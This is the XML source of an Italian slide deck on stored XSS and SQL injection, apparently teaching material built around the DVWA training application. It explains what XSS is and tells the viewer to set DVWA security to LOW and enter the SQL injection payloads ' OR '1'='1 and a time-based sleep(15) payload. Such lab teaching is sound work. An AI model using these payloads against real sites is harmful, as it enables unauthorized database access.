                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Selezionare </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1599">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans Bold"/>
                <a:ea typeface="Open Sans Bold"/>
                <a:cs typeface="Open Sans Bold"/>
                <a:sym typeface="Open Sans Bold"/>
              </a:rPr>
              <a:t>&lt;&lt;DVWA Security&gt;&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1599">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t> ed impostare il livello a LOW</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover dir="l"/>
  </p:transition>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7" id="7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="1867447" y="1835644"/>
            <a:ext cx="7139757" cy="6502862"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="9519675" cy="8670482"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr name="Picture 8" id="8"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="true"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:srcRect l="2319" t="0" r="2319" b="0"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false">
              <a:off x="0" y="0"/>
              <a:ext cx="9519675" cy="8670482"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 9" id="9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="1476431" y="1409727"/>
            <a:ext cx="782032" cy="1903146"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="556429" cy="1354120"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 10" id="10"/>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11" id="11"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 12" id="12"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="16029537" y="6967452"/>
            <a:ext cx="782032" cy="1903146"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="556429" cy="1354120"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 13" id="13"/>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14" id="14"/>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sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 15" id="15"/>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6" id="16"/>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20</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 17" id="17"/>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8" id="18"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="10447309" y="5363048"/>
            <a:ext cx="5078140" cy="649628"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2676"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1911">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>andare sulla pagina SQL Injection ed inserite il codice ' OR '1'='1 e cliccare Submit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 19" id="19"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="11383085" y="4267930"/>
            <a:ext cx="2788414" cy="339725"/>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Accesso alla DVWA </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 20" id="20"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="9737218" y="3862881"/>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01</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 21" id="21"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="9207414" y="1896744"/>
            <a:ext cx="7213138" cy="6441762"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1528069" cy="1364656"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 22" id="22"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="1528069" cy="1364656"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="1364656" w="1528069">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1528069" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1528069" y="1364656"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1364656"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="ABDB2A"/>
            </a:solidFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 23" id="23"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-28575"/>
              <a:ext cx="1528069" cy="1393231"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="2239"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 24" id="24"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="9528141" y="4896664"/>
            <a:ext cx="6497377" cy="622172"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2597"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1855">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>andare sulla pagina SQL Injection ed inserite il codice 1'  AND sleep(15)# e cliccare </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1855">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans Bold"/>
                <a:ea typeface="Open Sans Bold"/>
                <a:cs typeface="Open Sans Bold"/>
                <a:sym typeface="Open Sans Bold"/>
              </a:rPr>
              <a:t>Submit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 25" id="25"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="11595558" y="2952754"/>
            <a:ext cx="2436851" cy="397450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3247"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2319">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans Bold"/>
                <a:ea typeface="Open Sans Bold"/>
                <a:cs typeface="Open Sans Bold"/>
                <a:sym typeface="Open Sans Bold"/>
              </a:rPr>
              <a:t>SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 26" id="26"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="9528141" y="3546023"/>
            <a:ext cx="1098679" cy="1223878"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="10123"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="7230">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans Bold"/>
                <a:ea typeface="Open Sans Bold"/>
                <a:cs typeface="Open Sans Bold"/>
                <a:sym typeface="Open Sans Bold"/>
              </a:rPr>
              <a:t>03</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover dir="u"/>
  </p:transition>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0" y="2409315"/>
            <a:ext cx="18288000" cy="5468370"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="24384000" cy="7291160"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr name="Picture 5" id="5"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="true"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:srcRect l="0" t="18891" r="0" b="36227"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false">
              <a:off x="0" y="0"/>
              <a:ext cx="24384000" cy="7291160"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 6" id="6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="2126403" y="3511440"/>
            <a:ext cx="14035194" cy="3264119"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="3448420" cy="801988"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 7" id="7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="3448421" cy="801988"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="801988" w="3448421">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3448421" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3448421" y="801988"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="801988"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="ABDB2A">
                <a:alpha val="89804"/>
              </a:srgbClr>
            </a:solidFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 8" id="8"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-28575"/>
              <a:ext cx="3448420" cy="830563"/>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488106" y="9502973"/>
            <a:ext cx="402082" cy="402082"/>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11" id="11"/>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12" id="12"/>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3" id="13"/>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21</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 14" id="14"/>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5" id="15"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="2126403" y="3835793"/>
            <a:ext cx="14035194" cy="1999505"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="16307"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="11648">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="HK Modular"/>
                <a:ea typeface="HK Modular"/>
                <a:cs typeface="HK Modular"/>
                <a:sym typeface="HK Modular"/>
              </a:rPr>
              <a:t>Thank You</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 16" id="16"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="3974543" y="5835297"/>
            <a:ext cx="10338913" cy="264160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2239"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1599" spc="1279">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>XSS STORED&amp;SQL INJECTION</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover dir="u"/>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7" id="7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="7364099" y="1611412"/>
            <a:ext cx="2675186" cy="1136424"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1903439" cy="808585"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 8" id="8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="1903439" cy="808585"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="808585" w="1903439">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1903439" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1903439" y="808585"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="808585"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="ABDB2A"/>
            </a:solidFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 9" id="9"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-28575"/>
              <a:ext cx="1903439" cy="837160"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="2239"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 10" id="10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="0" y="2179624"/>
            <a:ext cx="10039285" cy="5927751"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="13385713" cy="7903668"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr name="Picture 11" id="11"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="true"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:srcRect l="1611" t="0" r="1611" b="0"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false">
              <a:off x="0" y="0"/>
              <a:ext cx="13385713" cy="7903668"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 12" id="12"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="0" y="6548209"/>
            <a:ext cx="782032" cy="3118333"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="556429" cy="2218746"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 13" id="13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="556429" cy="2218746"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="2218746" w="556429">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="556429" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="556429" y="2218746"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2218746"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="ABDB2A">
                <a:alpha val="74902"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln cap="sq">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 14" id="14"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-28575"/>
              <a:ext cx="556429" cy="2247321"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" marL="0" indent="0" lvl="0">
                <a:lnSpc>
                  <a:spcPts val="2239"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 15" id="15"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="10670331" y="3216096"/>
            <a:ext cx="1618141" cy="99952"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1151334" cy="71118"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 16" id="16"/>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17" id="17"/>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sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 18" id="18"/>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9" id="19"/>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03</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 20" id="20"/>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21" id="21"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="10670331" y="2065324"/>
            <a:ext cx="6852866" cy="873125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="7000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Modular"/>
                <a:ea typeface="HK Modular"/>
                <a:cs typeface="HK Modular"/>
                <a:sym typeface="HK Modular"/>
              </a:rPr>
              <a:t>Cos'è l'XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 22" id="22"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="10670331" y="3554174"/>
            <a:ext cx="6588969" cy="3931827"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2909"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2078">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Il Cross-Site Scripting (XSS) è una vulnerabilità di sicurezza comune nelle applicazioni web che consente agli attaccanti di iniettare script malevoli nei contenuti visualizzati dagli utenti.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2909"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2078">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Questi script possono essere utilizzati per rubare cookie di sessione, manipolare il contenuto delle pagine web, o reindirizzare gli utenti a siti web dannosi.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2909"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2078">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>L'XSS sfrutta la fiducia che gli utenti ripongono in un sito web affidabile, consentendo agli attaccanti di eseguire script nei browser degli utenti vittime.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3" id="3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="17488106" y="9502973"/>
            <a:ext cx="402082" cy="402082"/>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6" id="6"/>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7" id="7"/>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04</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 8" id="8"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 9" id="9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="13686739" y="0"/>
            <a:ext cx="4601261" cy="7702881"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="3273873" cy="5480727"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 10" id="10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="3273873" cy="5480727"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="5480727" w="3273873">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3273873" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3273873" y="5480727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="5480727"/>
                  </a:lnTo>
                  <a:close/>
